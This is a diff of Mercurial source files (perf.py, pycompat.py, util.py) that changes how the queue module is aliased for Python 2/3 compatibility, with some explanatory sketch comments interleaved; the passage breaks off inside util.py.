1643 1653 try:
1644 1654 for name in allfilters:
1645 1655 printname = name
1646 1656 if name is None:
1647 1657 printname = 'unfiltered'
1648 1658 timer(getbranchmap(name), title=str(printname))
1649 1659 finally:
1650 1660 branchcacheread.restore()
1651 1661 branchcachewrite.restore()
1652 1662 fm.end()
1653 1663
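# [Editor's sketch] The branchcache read/write stubbing above is attribute
# monkeypatching with an explicit restore. The same technique as a generic,
# self-contained context manager (all names here are illustrative):

import contextlib

@contextlib.contextmanager
def stubbedattr(obj, name, replacement):
    orig = getattr(obj, name)
    setattr(obj, name, replacement)
    try:
        yield
    finally:
        setattr(obj, name, orig)  # always restore, even on error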
1654 1664 @command('perfloadmarkers')
1655 1665 def perfloadmarkers(ui, repo):
1656 1666 """benchmark the time to parse the on-disk markers for a repo
1657 1667
1658 1668 Result is the number of markers in the repo."""
1659 1669 timer, fm = gettimer(ui)
1660 1670 svfs = getsvfs(repo)
1661 1671 timer(lambda: len(obsolete.obsstore(svfs)))
1662 1672 fm.end()
1663 1673
1664 1674 @command('perflrucachedict', formatteropts +
1665 1675 [('', 'size', 4, 'size of cache'),
1666 1676 ('', 'gets', 10000, 'number of key lookups'),
1667 1677 ('', 'sets', 10000, 'number of key sets'),
1668 1678 ('', 'mixed', 10000, 'number of mixed mode operations'),
1669 1679 ('', 'mixedgetfreq', 50, 'frequency of get vs set ops in mixed mode')],
1670 1680 norepo=True)
1671 1681 def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
1672 1682 mixedgetfreq=50, **opts):
1673 1683 def doinit():
1674 1684 for i in xrange(10000):
1675 1685 util.lrucachedict(size)
1676 1686
1677 1687 values = []
1678 1688 for i in xrange(size):
1679 1689 values.append(random.randint(0, sys.maxint))
1680 1690
1681 1691 # Get mode fills the cache and tests raw lookup performance with no
1682 1692 # eviction.
1683 1693 getseq = []
1684 1694 for i in xrange(gets):
1685 1695 getseq.append(random.choice(values))
1686 1696
1687 1697 def dogets():
1688 1698 d = util.lrucachedict(size)
1689 1699 for v in values:
1690 1700 d[v] = v
1691 1701 for key in getseq:
1692 1702 value = d[key]
1693 1703 value # silence pyflakes warning
1694 1704
1695 1705 # Set mode tests insertion speed with cache eviction.
1696 1706 setseq = []
1697 1707 for i in xrange(sets):
1698 1708 setseq.append(random.randint(0, sys.maxint))
1699 1709
1700 1710 def dosets():
1701 1711 d = util.lrucachedict(size)
1702 1712 for v in setseq:
1703 1713 d[v] = v
1704 1714
1705 1715 # Mixed mode randomly performs gets and sets with eviction.
1706 1716 mixedops = []
1707 1717 for i in xrange(mixed):
1708 1718 r = random.randint(0, 100)
1709 1719 if r < mixedgetfreq:
1710 1720 op = 0
1711 1721 else:
1712 1722 op = 1
1713 1723
1714 1724 mixedops.append((op, random.randint(0, size * 2)))
1715 1725
1716 1726 def domixed():
1717 1727 d = util.lrucachedict(size)
1718 1728
1719 1729 for op, v in mixedops:
1720 1730 if op == 0:
1721 1731 try:
1722 1732 d[v]
1723 1733 except KeyError:
1724 1734 pass
1725 1735 else:
1726 1736 d[v] = v
1727 1737
1728 1738 benches = [
1729 1739 (doinit, 'init'),
1730 1740 (dogets, 'gets'),
1731 1741 (dosets, 'sets'),
1732 1742 (domixed, 'mixed')
1733 1743 ]
1734 1744
1735 1745 for fn, title in benches:
1736 1746 timer, fm = gettimer(ui, opts)
1737 1747 timer(fn, title=title)
1738 1748 fm.end()
1739 1749
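# [Editor's sketch] Expected behavior of the structure benchmarked above, as
# implied by the get/set/mixed modes: util.lrucachedict is a capacity-bounded
# mapping that evicts the least recently used key on overflow. Illustrative
# usage (the authoritative behavior is util.py's; this only shows the shape):

d = util.lrucachedict(2)
d['a'] = 1
d['b'] = 2
d['a']        # touch 'a' so 'b' becomes the least recently used entry
d['c'] = 3    # capacity exceeded: 'b' should be evicted
assert 'b' not in d and 'a' in d and 'c' in d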
1740 1750 @command('perfwrite', formatteropts)
1741 1751 def perfwrite(ui, repo, **opts):
1742 1752 """microbenchmark ui.write
1743 1753 """
1744 1754 timer, fm = gettimer(ui, opts)
1745 1755 def write():
1746 1756 for i in range(100000):
1747 1757 ui.write(('Testing write performance\n'))
1748 1758 timer(write)
1749 1759 fm.end()
1750 1760
1751 1761 def uisetup(ui):
1752 1762 if (util.safehasattr(cmdutil, 'openrevlog') and
1753 1763 not util.safehasattr(commands, 'debugrevlogopts')):
1754 1764 # for "historical portability":
1755 1765 # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
1756 1766 # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
1757 1767 # openrevlog() should cause failure, because it has been
1758 1768 # available since 3.5 (or 49c583ca48c4).
1759 1769 def openrevlog(orig, repo, cmd, file_, opts):
1760 1770 if opts.get('dir') and not util.safehasattr(repo, 'dirlog'):
1761 1771 raise error.Abort("This version doesn't support --dir option",
1762 1772 hint="use 3.5 or later")
1763 1773 return orig(repo, cmd, file_, opts)
1764 1774 extensions.wrapfunction(cmdutil, 'openrevlog', openrevlog)
@@ -1,389 +1,386 b''
1 1 # pycompat.py - portability shim for python 3
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 6 """Mercurial portability shim for python 3.
7 7
8 8 This contains aliases to hide python version-specific details from the core.
9 9 """
10 10
11 11 from __future__ import absolute_import
12 12
13 13 import getopt
14 14 import inspect
15 15 import os
16 16 import shlex
17 17 import sys
18 18
19 19 ispy3 = (sys.version_info[0] >= 3)
20 20 ispypy = (r'__pypy__' in sys.builtin_module_names)
21 21
22 22 if not ispy3:
23 23 import cookielib
24 24 import cPickle as pickle
25 25 import httplib
26 import Queue as _queue
26 import Queue as queue
27 27 import SocketServer as socketserver
28 28 import xmlrpclib
29 29
30 30 from .thirdparty.concurrent import futures
31 31
32 32 def future_set_exception_info(f, exc_info):
33 33 f.set_exception_info(*exc_info)
34 34 else:
35 35 import concurrent.futures as futures
36 36 import http.cookiejar as cookielib
37 37 import http.client as httplib
38 38 import pickle
39 import queue as _queue
39 import queue as queue
40 40 import socketserver
41 41 import xmlrpc.client as xmlrpclib
42 42
43 43 def future_set_exception_info(f, exc_info):
44 44 f.set_exception(exc_info[0])
45 45
46 empty = _queue.Empty
47 queue = _queue.Queue
48
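# [Editor's sketch] After this change pycompat exports the queue *module*
# rather than individual symbols, so consumers name the members themselves.
# The migration implied by this diff (before it, util re-exported the Queue
# class as util.queue and the Empty exception as util.empty):

from mercurial import pycompat

q = pycompat.queue.Queue()      # was: q = util.queue()
try:
    q.get(block=False)
except pycompat.queue.Empty:    # was: except util.empty:
    pass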
49 46 def identity(a):
50 47 return a
51 48
52 49 if ispy3:
53 50 import builtins
54 51 import functools
55 52 import io
56 53 import struct
57 54
58 55 fsencode = os.fsencode
59 56 fsdecode = os.fsdecode
60 57 oscurdir = os.curdir.encode('ascii')
61 58 oslinesep = os.linesep.encode('ascii')
62 59 osname = os.name.encode('ascii')
63 60 ospathsep = os.pathsep.encode('ascii')
64 61 ospardir = os.pardir.encode('ascii')
65 62 ossep = os.sep.encode('ascii')
66 63 osaltsep = os.altsep
67 64 if osaltsep:
68 65 osaltsep = osaltsep.encode('ascii')
69 66 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
70 67 # returns bytes.
71 68 getcwd = os.getcwdb
72 69 sysplatform = sys.platform.encode('ascii')
73 70 sysexecutable = sys.executable
74 71 if sysexecutable:
75 72 sysexecutable = os.fsencode(sysexecutable)
76 73 bytesio = io.BytesIO
77 74 # TODO deprecate stringio name, as it is a lie on Python 3.
78 75 stringio = bytesio
79 76
80 77 def maplist(*args):
81 78 return list(map(*args))
82 79
83 80 def rangelist(*args):
84 81 return list(range(*args))
85 82
86 83 def ziplist(*args):
87 84 return list(zip(*args))
88 85
89 86 rawinput = input
90 87 getargspec = inspect.getfullargspec
91 88
92 89 # TODO: .buffer might not exist if std streams were replaced; we'll need
93 90 # a silly wrapper to make a bytes stream backed by a unicode one.
94 91 stdin = sys.stdin.buffer
95 92 stdout = sys.stdout.buffer
96 93 stderr = sys.stderr.buffer
97 94
98 95 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
99 96 # we can use os.fsencode() to get back bytes argv.
100 97 #
101 98 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
102 99 #
103 100 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
104 101 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
105 102 if getattr(sys, 'argv', None) is not None:
106 103 sysargv = list(map(os.fsencode, sys.argv))
107 104
108 105 bytechr = struct.Struct('>B').pack
109 106 byterepr = b'%r'.__mod__
110 107
111 108 class bytestr(bytes):
112 109 """A bytes which mostly acts as a Python 2 str
113 110
114 111 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
115 112 ('', 'foo', 'ascii', '1')
116 113 >>> s = bytestr(b'foo')
117 114 >>> assert s is bytestr(s)
118 115
119 116 __bytes__() should be called if provided:
120 117
121 118 >>> class bytesable(object):
122 119 ... def __bytes__(self):
123 120 ... return b'bytes'
124 121 >>> bytestr(bytesable())
125 122 'bytes'
126 123
127 124 There's no implicit conversion from non-ascii str as its encoding is
128 125 unknown:
129 126
130 127 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
131 128 Traceback (most recent call last):
132 129 ...
133 130 UnicodeEncodeError: ...
134 131
135 132 Comparison between bytestr and bytes should work:
136 133
137 134 >>> assert bytestr(b'foo') == b'foo'
138 135 >>> assert b'foo' == bytestr(b'foo')
139 136 >>> assert b'f' in bytestr(b'foo')
140 137 >>> assert bytestr(b'f') in b'foo'
141 138
142 139 Sliced elements should be bytes, not integer:
143 140
144 141 >>> s[1], s[:2]
145 142 (b'o', b'fo')
146 143 >>> list(s), list(reversed(s))
147 144 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
148 145
149 146 As bytestr type isn't propagated across operations, you need to cast
150 147 bytes to bytestr explicitly:
151 148
152 149 >>> s = bytestr(b'foo').upper()
153 150 >>> t = bytestr(s)
154 151 >>> s[0], t[0]
155 152 (70, b'F')
156 153
157 154 Be careful to not pass a bytestr object to a function which expects
158 155 bytearray-like behavior.
159 156
160 157 >>> t = bytes(t) # cast to bytes
161 158 >>> assert type(t) is bytes
162 159 """
163 160
164 161 def __new__(cls, s=b''):
165 162 if isinstance(s, bytestr):
166 163 return s
167 164 if (not isinstance(s, (bytes, bytearray))
168 165 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
169 166 s = str(s).encode(u'ascii')
170 167 return bytes.__new__(cls, s)
171 168
172 169 def __getitem__(self, key):
173 170 s = bytes.__getitem__(self, key)
174 171 if not isinstance(s, bytes):
175 172 s = bytechr(s)
176 173 return s
177 174
178 175 def __iter__(self):
179 176 return iterbytestr(bytes.__iter__(self))
180 177
181 178 def __repr__(self):
182 179 return bytes.__repr__(self)[1:] # drop b''
183 180
184 181 def iterbytestr(s):
185 182 """Iterate bytes as if it were a str object of Python 2"""
186 183 return map(bytechr, s)
187 184
188 185 def maybebytestr(s):
189 186 """Promote bytes to bytestr"""
190 187 if isinstance(s, bytes):
191 188 return bytestr(s)
192 189 return s
193 190
194 191 def sysbytes(s):
195 192 """Convert an internal str (e.g. keyword, __doc__) back to bytes
196 193
197 194 This never raises UnicodeEncodeError, but only ASCII characters
198 195 can be round-tripped by sysstr(sysbytes(s)).
199 196 """
200 197 return s.encode(u'utf-8')
201 198
202 199 def sysstr(s):
203 200 """Return a keyword str to be passed to Python functions such as
204 201 getattr() and str.encode()
205 202
206 203 This never raises UnicodeDecodeError. Non-ascii characters are
207 204 considered invalid and mapped to arbitrary but unique code points
208 205 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
209 206 """
210 207 if isinstance(s, builtins.str):
211 208 return s
212 209 return s.decode(u'latin-1')
213 210
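# [Editor's sketch] Round-trip behavior of the pair above on Python 3:
# sysbytes() encodes utf-8 while sysstr() decodes latin-1, so only ASCII
# survives a full round trip, exactly as sysbytes's docstring states:

assert sysstr(b'abc') == 'abc'
assert sysbytes(sysstr(b'abc')) == b'abc'   # ASCII round-trips
assert sysstr(b'\xc3\xa9') == u'\xc3\xa9'   # latin-1: unique code points,
                                            # not the original utf-8 text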
214 211 def strurl(url):
215 212 """Converts a bytes url back to str"""
216 213 if isinstance(url, bytes):
217 214 return url.decode(u'ascii')
218 215 return url
219 216
220 217 def bytesurl(url):
221 218 """Converts a str url to bytes by encoding in ascii"""
222 219 if isinstance(url, str):
223 220 return url.encode(u'ascii')
224 221 return url
225 222
226 223 def raisewithtb(exc, tb):
227 224 """Raise exception with the given traceback"""
228 225 raise exc.with_traceback(tb)
229 226
230 227 def getdoc(obj):
231 228 """Get docstring as bytes; may be None so gettext() won't confuse it
232 229 with _('')"""
233 230 doc = getattr(obj, u'__doc__', None)
234 231 if doc is None:
235 232 return doc
236 233 return sysbytes(doc)
237 234
238 235 def _wrapattrfunc(f):
239 236 @functools.wraps(f)
240 237 def w(object, name, *args):
241 238 return f(object, sysstr(name), *args)
242 239 return w
243 240
244 241 # these wrappers are automagically imported by hgloader
245 242 delattr = _wrapattrfunc(builtins.delattr)
246 243 getattr = _wrapattrfunc(builtins.getattr)
247 244 hasattr = _wrapattrfunc(builtins.hasattr)
248 245 setattr = _wrapattrfunc(builtins.setattr)
249 246 xrange = builtins.range
250 247 unicode = str
251 248
252 249 def open(name, mode='r', buffering=-1, encoding=None):
253 250 return builtins.open(name, sysstr(mode), buffering, encoding)
254 251
255 252 safehasattr = _wrapattrfunc(builtins.hasattr)
256 253
257 254 def _getoptbwrapper(orig, args, shortlist, namelist):
258 255 """
259 256 Takes bytes arguments, converts them to unicode, pass them to
260 257 getopt.getopt(), convert the returned values back to bytes and then
261 258 return them for Python 3 compatibility as getopt.getopt() don't accepts
262 259 bytes on Python 3.
263 260 """
264 261 args = [a.decode('latin-1') for a in args]
265 262 shortlist = shortlist.decode('latin-1')
266 263 namelist = [a.decode('latin-1') for a in namelist]
267 264 opts, args = orig(args, shortlist, namelist)
268 265 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
269 266 for a in opts]
270 267 args = [a.encode('latin-1') for a in args]
271 268 return opts, args
272 269
273 270 def strkwargs(dic):
274 271 """
275 272 Converts the keys of a python dictionary to str (i.e. unicode) so that
276 273 they can be passed as keyword arguments, since dictionaries with bytes
277 274 keys can't be passed as keyword arguments to functions on Python 3.
278 275 """
279 276 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
280 277 return dic
281 278
282 279 def byteskwargs(dic):
283 280 """
284 281 Converts the keys of python dictionaries back to bytes, after they were
285 282 converted to str to pass the dictionary as keyword arguments on Python 3.
286 283 """
287 284 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
288 285 return dic
289 286
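# [Editor's sketch] Typical call-site pattern for the pair above, matching
# the perf.py hunk in this same change: **kwargs arrive with str keys on
# Python 3, are narrowed back to bytes keys at the function boundary, and
# widened again when forwarded ('somecommand' and 'callee' are hypothetical
# names used only for illustration):

def somecommand(ui, repo, callee, **opts):
    opts = pycompat.byteskwargs(opts)         # str keys -> bytes keys
    rev = opts.get(b'rev')
    return callee(repo, rev, **pycompat.strkwargs(opts))  # and back to str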
290 287 # TODO: handle shlex.shlex().
291 288 def shlexsplit(s, comments=False, posix=True):
292 289 """
293 290 Takes a bytes argument, converts it to str (i.e. unicode), passes it to
294 291 shlex.split(), converts the returned value back to bytes, and returns it,
295 292 for Python 3 compatibility, since shlex.split() doesn't accept bytes on Python 3.
296 293 """
297 294 ret = shlex.split(s.decode('latin-1'), comments, posix)
298 295 return [a.encode('latin-1') for a in ret]
299 296
300 297 def emailparser(*args, **kwargs):
301 298 import email.parser
302 299 return email.parser.BytesParser(*args, **kwargs)
303 300
304 301 else:
305 302 import cStringIO
306 303
307 304 bytechr = chr
308 305 byterepr = repr
309 306 bytestr = str
310 307 iterbytestr = iter
311 308 maybebytestr = identity
312 309 sysbytes = identity
313 310 sysstr = identity
314 311 strurl = identity
315 312 bytesurl = identity
316 313
317 314 # this can't be parsed on Python 3
318 315 exec('def raisewithtb(exc, tb):\n'
319 316 ' raise exc, None, tb\n')
320 317
321 318 def fsencode(filename):
322 319 """
323 320 Partial backport from os.py in Python 3, which only accepts bytes.
324 321 In Python 2, our paths should only ever be bytes, a unicode path
325 322 indicates a bug.
326 323 """
327 324 if isinstance(filename, str):
328 325 return filename
329 326 else:
330 327 raise TypeError(
331 328 "expect str, not %s" % type(filename).__name__)
332 329
333 330 # In Python 2, fsdecode() has a very good chance to receive bytes. So it's
334 331 # better not to touch the Python 2 part as it's already working fine.
335 332 fsdecode = identity
336 333
337 334 def getdoc(obj):
338 335 return getattr(obj, '__doc__', None)
339 336
340 337 _notset = object()
341 338
342 339 def safehasattr(thing, attr):
343 340 return getattr(thing, attr, _notset) is not _notset
344 341
345 342 def _getoptbwrapper(orig, args, shortlist, namelist):
346 343 return orig(args, shortlist, namelist)
347 344
348 345 strkwargs = identity
349 346 byteskwargs = identity
350 347
351 348 oscurdir = os.curdir
352 349 oslinesep = os.linesep
353 350 osname = os.name
354 351 ospathsep = os.pathsep
355 352 ospardir = os.pardir
356 353 ossep = os.sep
357 354 osaltsep = os.altsep
358 355 stdin = sys.stdin
359 356 stdout = sys.stdout
360 357 stderr = sys.stderr
361 358 if getattr(sys, 'argv', None) is not None:
362 359 sysargv = sys.argv
363 360 sysplatform = sys.platform
364 361 getcwd = os.getcwd
365 362 sysexecutable = sys.executable
366 363 shlexsplit = shlex.split
367 364 bytesio = cStringIO.StringIO
368 365 stringio = bytesio
369 366 maplist = map
370 367 rangelist = range
371 368 ziplist = zip
372 369 rawinput = raw_input
373 370 getargspec = inspect.getargspec
374 371
375 372 def emailparser(*args, **kwargs):
376 373 import email.parser
377 374 return email.parser.Parser(*args, **kwargs)
378 375
379 376 isjython = sysplatform.startswith('java')
380 377
381 378 isdarwin = sysplatform == 'darwin'
382 379 isposix = osname == 'posix'
383 380 iswindows = osname == 'nt'
384 381
385 382 def getoptb(args, shortlist, namelist):
386 383 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
387 384
388 385 def gnugetoptb(args, shortlist, namelist):
389 386 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
@@ -1,3876 +1,3874 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import tempfile
35 35 import time
36 36 import traceback
37 37 import warnings
38 38 import zlib
39 39
40 40 from . import (
41 41 encoding,
42 42 error,
43 43 i18n,
44 44 node as nodemod,
45 45 policy,
46 46 pycompat,
47 47 urllibcompat,
48 48 )
49 49 from .utils import (
50 50 dateutil,
51 51 procutil,
52 52 stringutil,
53 53 )
54 54
55 55 base85 = policy.importmod(r'base85')
56 56 osutil = policy.importmod(r'osutil')
57 57 parsers = policy.importmod(r'parsers')
58 58
59 59 b85decode = base85.b85decode
60 60 b85encode = base85.b85encode
61 61
62 62 cookielib = pycompat.cookielib
63 empty = pycompat.empty
64 63 httplib = pycompat.httplib
65 64 pickle = pycompat.pickle
66 queue = pycompat.queue
67 65 safehasattr = pycompat.safehasattr
68 66 socketserver = pycompat.socketserver
69 67 bytesio = pycompat.bytesio
70 68 # TODO deprecate stringio name, as it is a lie on Python 3.
71 69 stringio = bytesio
72 70 xmlrpclib = pycompat.xmlrpclib
73 71
74 72 httpserver = urllibcompat.httpserver
75 73 urlerr = urllibcompat.urlerr
76 74 urlreq = urllibcompat.urlreq
77 75
78 76 # workaround for win32mbcs
79 77 _filenamebytestr = pycompat.bytestr
80 78
81 79 if pycompat.iswindows:
82 80 from . import windows as platform
83 81 else:
84 82 from . import posix as platform
85 83
86 84 _ = i18n._
87 85
88 86 bindunixsocket = platform.bindunixsocket
89 87 cachestat = platform.cachestat
90 88 checkexec = platform.checkexec
91 89 checklink = platform.checklink
92 90 copymode = platform.copymode
93 91 expandglobs = platform.expandglobs
94 92 getfsmountpoint = platform.getfsmountpoint
95 93 getfstype = platform.getfstype
96 94 groupmembers = platform.groupmembers
97 95 groupname = platform.groupname
98 96 isexec = platform.isexec
99 97 isowner = platform.isowner
100 98 listdir = osutil.listdir
101 99 localpath = platform.localpath
102 100 lookupreg = platform.lookupreg
103 101 makedir = platform.makedir
104 102 nlinks = platform.nlinks
105 103 normpath = platform.normpath
106 104 normcase = platform.normcase
107 105 normcasespec = platform.normcasespec
108 106 normcasefallback = platform.normcasefallback
109 107 openhardlinks = platform.openhardlinks
110 108 oslink = platform.oslink
111 109 parsepatchoutput = platform.parsepatchoutput
112 110 pconvert = platform.pconvert
113 111 poll = platform.poll
114 112 posixfile = platform.posixfile
115 113 rename = platform.rename
116 114 removedirs = platform.removedirs
117 115 samedevice = platform.samedevice
118 116 samefile = platform.samefile
119 117 samestat = platform.samestat
120 118 setflags = platform.setflags
121 119 split = platform.split
122 120 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 121 statisexec = platform.statisexec
124 122 statislink = platform.statislink
125 123 umask = platform.umask
126 124 unlink = platform.unlink
127 125 username = platform.username
128 126
129 127 try:
130 128 recvfds = osutil.recvfds
131 129 except AttributeError:
132 130 pass
133 131
134 132 # Python compatibility
135 133
136 134 _notset = object()
137 135
138 136 def _rapply(f, xs):
139 137 if xs is None:
140 138 # assume None means non-value of optional data
141 139 return xs
142 140 if isinstance(xs, (list, set, tuple)):
143 141 return type(xs)(_rapply(f, x) for x in xs)
144 142 if isinstance(xs, dict):
145 143 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 144 return f(xs)
147 145
148 146 def rapply(f, xs):
149 147 """Apply function recursively to every item preserving the data structure
150 148
151 149 >>> def f(x):
152 150 ... return 'f(%s)' % x
153 151 >>> rapply(f, None) is None
154 152 True
155 153 >>> rapply(f, 'a')
156 154 'f(a)'
157 155 >>> rapply(f, {'a'}) == {'f(a)'}
158 156 True
159 157 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 158 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161 159
162 160 >>> xs = [object()]
163 161 >>> rapply(pycompat.identity, xs) is xs
164 162 True
165 163 """
166 164 if f is pycompat.identity:
167 165 # fast path mainly for py2
168 166 return xs
169 167 return _rapply(f, xs)
170 168
171 169 def bitsfrom(container):
172 170 bits = 0
173 171 for bit in container:
174 172 bits |= bit
175 173 return bits
176 174
177 175 # python 2.6 still has deprecation warnings enabled by default. We do not want
178 176 # to display anything to the standard user, so detect if we are running tests and
179 177 # only use python deprecation warnings in that case.
180 178 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 179 if _dowarn:
182 180 # explicitly unfilter our warning for python 2.7
183 181 #
184 182 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 183 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 184 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 185 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 186 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 187 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 189 if _dowarn and pycompat.ispy3:
192 190 # silence warning emitted by passing user string to re.sub()
193 191 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 192 r'mercurial')
195 193 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 194 DeprecationWarning, r'mercurial')
197 195 # TODO: reinvent imp.is_frozen()
198 196 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
199 197 DeprecationWarning, r'mercurial')
200 198
201 199 def nouideprecwarn(msg, version, stacklevel=1):
202 200 """Issue an python native deprecation warning
203 201
204 202 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
205 203 """
206 204 if _dowarn:
207 205 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
208 206 " update your code.)") % version
209 207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
210 208
211 209 DIGESTS = {
212 210 'md5': hashlib.md5,
213 211 'sha1': hashlib.sha1,
214 212 'sha512': hashlib.sha512,
215 213 }
216 214 # List of digest types from strongest to weakest
217 215 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
218 216
219 217 for k in DIGESTS_BY_STRENGTH:
220 218 assert k in DIGESTS
221 219
222 220 class digester(object):
223 221 """helper to compute digests.
224 222
225 223 This helper can be used to compute one or more digests given their name.
226 224
227 225 >>> d = digester([b'md5', b'sha1'])
228 226 >>> d.update(b'foo')
229 227 >>> [k for k in sorted(d)]
230 228 ['md5', 'sha1']
231 229 >>> d[b'md5']
232 230 'acbd18db4cc2f85cedef654fccc4a4d8'
233 231 >>> d[b'sha1']
234 232 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
235 233 >>> digester.preferred([b'md5', b'sha1'])
236 234 'sha1'
237 235 """
238 236
239 237 def __init__(self, digests, s=''):
240 238 self._hashes = {}
241 239 for k in digests:
242 240 if k not in DIGESTS:
243 241 raise error.Abort(_('unknown digest type: %s') % k)
244 242 self._hashes[k] = DIGESTS[k]()
245 243 if s:
246 244 self.update(s)
247 245
248 246 def update(self, data):
249 247 for h in self._hashes.values():
250 248 h.update(data)
251 249
252 250 def __getitem__(self, key):
253 251 if key not in DIGESTS:
254 252 raise error.Abort(_('unknown digest type: %s') % key)
255 253 return nodemod.hex(self._hashes[key].digest())
256 254
257 255 def __iter__(self):
258 256 return iter(self._hashes)
259 257
260 258 @staticmethod
261 259 def preferred(supported):
262 260 """returns the strongest digest type in both supported and DIGESTS."""
263 261
264 262 for k in DIGESTS_BY_STRENGTH:
265 263 if k in supported:
266 264 return k
267 265 return None
268 266
269 267 class digestchecker(object):
270 268 """file handle wrapper that additionally checks content against a given
271 269 size and digests.
272 270
273 271 d = digestchecker(fh, size, {'md5': '...'})
274 272
275 273 When multiple digests are given, all of them are validated.
276 274 """
277 275
278 276 def __init__(self, fh, size, digests):
279 277 self._fh = fh
280 278 self._size = size
281 279 self._got = 0
282 280 self._digests = dict(digests)
283 281 self._digester = digester(self._digests.keys())
284 282
285 283 def read(self, length=-1):
286 284 content = self._fh.read(length)
287 285 self._digester.update(content)
288 286 self._got += len(content)
289 287 return content
290 288
291 289 def validate(self):
292 290 if self._size != self._got:
293 291 raise error.Abort(_('size mismatch: expected %d, got %d') %
294 292 (self._size, self._got))
295 293 for k, v in self._digests.items():
296 294 if v != self._digester[k]:
297 295 # i18n: first parameter is a digest name
298 296 raise error.Abort(_('%s mismatch: expected %s, got %s') %
299 297 (k, v, self._digester[k]))
300 298
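# Illustrative sketch (added for illustration, not part of the module):
# how digestchecker might be used to validate a stream. The handle, size
# and digest value are hypothetical.
def _exampledigestcheck(fh, size, sha1hex):
    """Read 'fh' fully; abort unless it had 'size' bytes and the expected
    sha1 (validate() raises error.Abort on any mismatch)."""
    checker = digestchecker(fh, size, {'sha1': sha1hex})
    while checker.read(4096):
        pass
    checker.validate()
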
301 299 try:
302 300 buffer = buffer
303 301 except NameError:
304 302 def buffer(sliceable, offset=0, length=None):
305 303 if length is not None:
306 304 return memoryview(sliceable)[offset:offset + length]
307 305 return memoryview(sliceable)[offset:]
308 306
309 307 _chunksize = 4096
310 308
311 309 class bufferedinputpipe(object):
312 310 """a manually buffered input pipe
313 311
314 312 Python will not let us use buffered IO and lazy reading with 'polling' at
315 313 the same time. We cannot probe the buffer state and select will not detect
316 314 that data are ready to read if they are already buffered.
317 315
318 316 This class lets us work around that by implementing its own buffering
319 317 (allowing efficient readline) while offering a way to know if the buffer is
320 318 empty from the outside (allowing collaboration of the buffer with polling).
321 319
322 320 This class lives in the 'util' module because it makes use of the 'os'
323 321 module from the python stdlib.
324 322 """
325 323 def __new__(cls, fh):
326 324 # If we receive a fileobjectproxy, we need to use a variation of this
327 325 # class that notifies observers about activity.
328 326 if isinstance(fh, fileobjectproxy):
329 327 cls = observedbufferedinputpipe
330 328
331 329 return super(bufferedinputpipe, cls).__new__(cls)
332 330
333 331 def __init__(self, input):
334 332 self._input = input
335 333 self._buffer = []
336 334 self._eof = False
337 335 self._lenbuf = 0
338 336
339 337 @property
340 338 def hasbuffer(self):
341 339 """True is any data is currently buffered
342 340
343 341 This will be used externally a pre-step for polling IO. If there is
344 342 already data then no polling should be set in place."""
345 343 return bool(self._buffer)
346 344
347 345 @property
348 346 def closed(self):
349 347 return self._input.closed
350 348
351 349 def fileno(self):
352 350 return self._input.fileno()
353 351
354 352 def close(self):
355 353 return self._input.close()
356 354
357 355 def read(self, size):
358 356 while (not self._eof) and (self._lenbuf < size):
359 357 self._fillbuffer()
360 358 return self._frombuffer(size)
361 359
362 360 def readline(self, *args, **kwargs):
363 361 if 1 < len(self._buffer):
364 362 # this should not happen because both read and readline end with a
365 363 # _frombuffer call that collapses it.
366 364 self._buffer = [''.join(self._buffer)]
